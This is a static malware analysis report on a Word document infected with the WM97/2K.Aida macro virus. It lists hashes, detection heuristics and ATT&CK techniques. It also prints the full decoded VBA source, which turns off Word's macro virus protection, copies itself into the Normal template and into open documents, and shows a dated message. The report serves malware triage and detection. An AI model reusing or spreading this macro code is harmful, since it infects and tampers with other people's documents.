Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 44bf4cd1ac5203b3…

MALICIOUS

Office (OLE)

28.5 KB Created: 2000-12-30 17:59:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: c320d48269d115943d0625b146d325c3 SHA-1: bcf085abcb0cb9552ae4838b5f765a08d214ab18 SHA-256: 44bf4cd1ac5203b3d6c623d9add07fac60866c2972b48d38595d30f658f572b4
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a malicious VBA macro. The macro is designed to infect other documents and includes a payload. The ClamAV detection identifies it as 'Doc.Trojan.Aida-1', suggesting a known trojan family, but specific IOCs for payload delivery are not present in the provided evidence.

Heuristics 3

  • ClamAV: Doc.Trojan.Aida-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Aida-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1822 bytes
SHA-256: 50f2c802413cfcde9c6377ff96f0e4e32f5a6a5b578c8923937dbf0d862a2f82
Detection
ClamAV: Doc.Trojan.Aida-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
---------------------------------------------------------------
Virus name:             WM97/2K.Aida aka Macro.Word97.Aida
Virus author:           e [ax] / EBVL / VXI

Virus description:

- Infection method:     SIM [String Infection Method]
- Polymorphic:          no
- Encryption:           no
- Payload:              yes
---------------------------------------------------------------

'Aida
Private Sub Document_Open(): With Options: Const nula = 0
.VirusProtection = nula
End With: Dim a, b, c, d
a = Strings.RTrim(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, _
ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines))
With NormalTemplate.VBProject.VBComponents(1).CodeModule
c = .Lines(1, 1)
If c <> "'Aida" Then
.DeleteLines 1, NormalTemplate.VBProject.VBComponents(1) _
.CodeModule.CountOfLines
.InsertLines 1, a
End If
End With
With ActiveDocument.VBProject.VBComponents(1).CodeModule
d = .Lines(1, 1)
If d <> "'Aida" Then
.DeleteLines 1, ActiveDocument.VBProject.VBComponents(1) _
.CodeModule.CountOfLines
.InsertLines 1, a
End If: End With
If Day(Now()) = 14 And Month(Now()) = 9 Then
With Selection
.Font.Bold = True: .Font.Color = wdColorViolet
.Font.Size = 26: .Font.Emboss = True
.Font.Animation = wdAnimationSparkleText
.Font.Shadow = True: .ParagraphFormat.Alignment = wdAlignParagraphCenter
Selection.Text = "Aida: Where ever You are, You are only one that I loved truely!"
End With
End If
'WM97/2K.Aida by e[ax]
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.